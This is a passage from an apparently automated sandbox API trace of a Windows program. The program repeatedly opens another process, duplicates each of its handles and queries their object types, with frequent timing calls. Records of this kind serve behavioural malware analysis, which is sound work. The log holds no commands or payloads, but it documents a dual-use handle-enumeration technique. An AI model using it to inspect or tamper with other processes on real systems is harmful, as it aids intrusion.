lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.253] GetTickCount () returned 0xe86374 [0113.253] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.253] GetTickCount () returned 0xe86374 [0113.253] CloseHandle (hObject=0x1b8) returned 1 [0113.253] CloseHandle (hObject=0x198) returned 1 [0113.253] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.253] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.254] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.254] CloseHandle (hObject=0x1b8) returned 1 [0113.254] CloseHandle (hObject=0x198) returned 1 [0113.254] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.254] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.254] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.254] CloseHandle (hObject=0x1b8) returned 1 [0113.255] CloseHandle (hObject=0x198) returned 1 [0113.255] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.255] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x24, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.255] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.255] CloseHandle (hObject=0x1b8) returned 1 [0113.255] CloseHandle (hObject=0x198) returned 1 [0113.255] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.255] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.256] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.256] CloseHandle (hObject=0x1b8) returned 1 [0113.256] CloseHandle (hObject=0x198) returned 1 [0113.256] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.256] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.256] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.256] CloseHandle (hObject=0x1b8) returned 1 [0113.256] CloseHandle (hObject=0x198) returned 1 [0113.256] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.257] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x30, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.257] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.257] CloseHandle (hObject=0x1b8) returned 1 [0113.257] CloseHandle (hObject=0x198) returned 1 [0113.257] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.257] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.257] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.257] CloseHandle (hObject=0x1b8) returned 1 [0113.258] CloseHandle (hObject=0x198) returned 1 [0113.258] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.258] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.258] CloseHandle (hObject=0x198) returned 1 [0113.258] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.258] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.258] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.258] CloseHandle (hObject=0x1b8) returned 1 [0113.258] CloseHandle (hObject=0x198) returned 1 [0113.259] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.259] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x40, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.259] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.259] CloseHandle (hObject=0x1b8) returned 1 [0113.259] CloseHandle (hObject=0x198) returned 1 [0113.259] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.259] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x44, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.259] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.260] CloseHandle (hObject=0x1b8) returned 1 [0113.260] CloseHandle (hObject=0x198) returned 1 [0113.260] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.260] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x48, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.260] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.260] CloseHandle (hObject=0x1b8) returned 1 [0113.260] CloseHandle (hObject=0x198) returned 1 [0113.260] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.261] GetTickCount () returned 0xe86384 [0113.261] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x4c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.261] GetTickCount () returned 0xe86384 [0113.261] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.261] GetTickCount () returned 0xe86384 [0113.261] GetTickCount () returned 0xe86384 [0113.261] CloseHandle (hObject=0x1b8) returned 1 [0113.261] GetTickCount () returned 0xe86384 [0113.261] CloseHandle (hObject=0x198) returned 1 [0113.261] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.261] GetTickCount () returned 0xe86384 [0113.261] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x50, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.261] GetTickCount () returned 0xe86384 [0113.262] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.262] GetTickCount () returned 0xe86384 [0113.262] GetTickCount () returned 0xe86384 [0113.262] CloseHandle (hObject=0x1b8) returned 1 [0113.262] GetTickCount () returned 0xe86384 [0113.262] CloseHandle (hObject=0x198) returned 1 [0113.262] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.262] GetTickCount () returned 0xe86384 [0113.262] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x54, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.262] GetTickCount () returned 0xe86384 [0113.262] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.262] GetTickCount () returned 0xe86384 [0113.262] GetTickCount () returned 0xe86384 [0113.262] CloseHandle (hObject=0x1b8) returned 1 [0113.262] GetTickCount () returned 0xe86384 [0113.263] CloseHandle (hObject=0x198) returned 1 [0113.263] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.263] GetTickCount () returned 0xe86384 [0113.263] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x58, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.263] GetTickCount () returned 0xe86384 [0113.263] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.263] GetTickCount () returned 0xe86384 [0113.263] GetTickCount () returned 0xe86384 [0113.263] CloseHandle (hObject=0x1b8) returned 1 [0113.263] GetTickCount () returned 0xe86384 [0113.263] CloseHandle (hObject=0x198) returned 1 [0113.263] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.263] GetTickCount () returned 0xe86384 [0113.263] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.263] GetTickCount () returned 0xe86384 [0113.264] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.264] GetTickCount () returned 0xe86384 [0113.264] GetTickCount () returned 0xe86384 [0113.264] CloseHandle (hObject=0x1b8) returned 1 [0113.264] GetTickCount () returned 0xe86384 [0113.264] CloseHandle (hObject=0x198) returned 1 [0113.264] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.264] GetTickCount () returned 0xe86384 [0113.264] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x60, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.264] GetTickCount () returned 0xe86384 [0113.264] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.264] GetTickCount () returned 0xe86384 [0113.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.264] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.264] GetTickCount () returned 0xe86384 [0113.265] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.265] GetTickCount () returned 0xe86384 [0113.265] CloseHandle (hObject=0x1b8) returned 1 [0113.265] GetTickCount () returned 0xe86384 [0113.265] CloseHandle (hObject=0x198) returned 1 [0113.265] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.265] GetTickCount () returned 0xe86384 [0113.265] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x64, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.265] GetTickCount () returned 0xe86384 [0113.265] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.265] GetTickCount () returned 0xe86384 [0113.265] GetTickCount () returned 0xe86384 [0113.265] CloseHandle (hObject=0x1b8) returned 1 [0113.265] GetTickCount () returned 0xe86384 [0113.265] CloseHandle (hObject=0x198) returned 1 [0113.266] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.266] GetTickCount () returned 0xe86384 [0113.266] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x68, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.266] GetTickCount () returned 0xe86384 [0113.266] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.266] GetTickCount () returned 0xe86384 [0113.266] GetTickCount () returned 0xe86384 [0113.266] CloseHandle (hObject=0x1b8) returned 1 [0113.266] GetTickCount () returned 0xe86384 [0113.266] CloseHandle (hObject=0x198) returned 1 [0113.266] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.266] GetTickCount () returned 0xe86384 [0113.266] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.266] GetTickCount () returned 0xe86384 [0113.266] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.267] GetTickCount () returned 0xe86384 [0113.267] GetTickCount () returned 0xe86384 [0113.267] CloseHandle (hObject=0x1b8) returned 1 [0113.267] GetTickCount () returned 0xe86384 [0113.267] CloseHandle (hObject=0x198) returned 1 [0113.267] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.267] GetTickCount () returned 0xe86384 [0113.267] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x70, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.267] GetTickCount () returned 0xe86384 [0113.267] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.267] GetTickCount () returned 0xe86384 [0113.267] GetTickCount () returned 0xe86384 [0113.267] CloseHandle (hObject=0x1b8) returned 1 [0113.267] GetTickCount () returned 0xe86384 [0113.268] CloseHandle (hObject=0x198) returned 1 [0113.268] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.268] GetTickCount () returned 0xe86384 [0113.268] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x74, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.268] GetTickCount () returned 0xe86384 [0113.268] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.269] GetTickCount () returned 0xe86384 [0113.269] GetTickCount () returned 0xe86384 [0113.269] CloseHandle (hObject=0x1b8) returned 1 [0113.269] GetTickCount () returned 0xe86384 [0113.269] CloseHandle (hObject=0x198) returned 1 [0113.269] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.269] GetTickCount () returned 0xe86384 [0113.269] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x78, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.269] GetTickCount () returned 0xe86384 [0113.269] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.269] GetTickCount () returned 0xe86384 [0113.269] GetTickCount () returned 0xe86384 [0113.269] CloseHandle (hObject=0x1b8) returned 1 [0113.269] GetTickCount () returned 0xe86384 [0113.270] CloseHandle (hObject=0x198) returned 1 [0113.270] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.270] GetTickCount () returned 0xe86384 [0113.270] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.270] GetTickCount () returned 0xe86384 [0113.270] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.270] GetTickCount () returned 0xe86384 [0113.270] GetTickCount () returned 0xe86384 [0113.270] CloseHandle (hObject=0x1b8) returned 1 [0113.270] GetTickCount () returned 0xe86384 [0113.270] CloseHandle (hObject=0x198) returned 1 [0113.270] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.270] GetTickCount () returned 0xe86384 [0113.270] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x80, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.270] GetTickCount () returned 0xe86384 [0113.271] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.271] GetTickCount () returned 0xe86384 [0113.271] GetTickCount () returned 0xe86384 [0113.271] CloseHandle (hObject=0x1b8) returned 1 [0113.271] GetTickCount () returned 0xe86384 [0113.271] CloseHandle (hObject=0x198) returned 1 [0113.271] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.271] GetTickCount () returned 0xe86384 [0113.271] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x84, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.271] GetTickCount () returned 0xe86384 [0113.271] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.271] GetTickCount () returned 0xe86384 [0113.271] GetTickCount () returned 0xe86384 [0113.272] CloseHandle (hObject=0x1b8) returned 1 [0113.272] GetTickCount () returned 0xe86384 [0113.272] CloseHandle (hObject=0x198) returned 1 [0113.272] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.272] GetTickCount () returned 0xe86384 [0113.272] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x88, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.272] GetTickCount () returned 0xe86384 [0113.272] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.272] GetTickCount () returned 0xe86384 [0113.272] GetTickCount () returned 0xe86384 [0113.272] CloseHandle (hObject=0x1b8) returned 1 [0113.272] GetTickCount () returned 0xe86384 [0113.272] CloseHandle (hObject=0x198) returned 1 [0113.272] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.272] GetTickCount () returned 0xe86393 [0113.273] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x8c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.273] GetTickCount () returned 0xe86393 [0113.273] GetTickCount () returned 0xe86393 [0113.273] CloseHandle (hObject=0x198) returned 1 [0113.273] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.273] GetTickCount () returned 0xe86393 [0113.273] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x90, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.273] GetTickCount () returned 0xe86393 [0113.273] GetTickCount () returned 0xe86393 [0113.273] CloseHandle (hObject=0x198) returned 1 [0113.273] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.273] GetTickCount () returned 0xe86393 [0113.274] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x94, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.274] GetTickCount () returned 0xe86393 [0113.274] GetTickCount () returned 0xe86393 [0113.274] CloseHandle (hObject=0x198) returned 1 [0113.274] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.274] GetTickCount () returned 0xe86393 [0113.274] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x98, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.274] GetTickCount () returned 0xe86393 [0113.274] GetTickCount () returned 0xe86393 [0113.274] CloseHandle (hObject=0x198) returned 1 [0113.274] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.274] GetTickCount () returned 0xe86393 [0113.274] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x9c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.274] GetTickCount () returned 0xe86393 [0113.274] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.275] GetTickCount () returned 0xe86393 [0113.275] GetTickCount () returned 0xe86393 [0113.275] CloseHandle (hObject=0x1b8) returned 1 [0113.275] GetTickCount () returned 0xe86393 [0113.275] CloseHandle (hObject=0x198) returned 1 [0113.275] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.275] GetTickCount () returned 0xe86393 [0113.275] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.275] GetTickCount () returned 0xe86393 [0113.275] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.275] GetTickCount () returned 0xe86393 [0113.275] GetTickCount () returned 0xe86393 [0113.275] CloseHandle (hObject=0x1b8) returned 1 [0113.275] GetTickCount () returned 0xe86393 [0113.276] CloseHandle (hObject=0x198) returned 1 [0113.276] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.276] GetTickCount () returned 0xe86393 [0113.276] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.276] GetTickCount () returned 0xe86393 [0113.276] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, 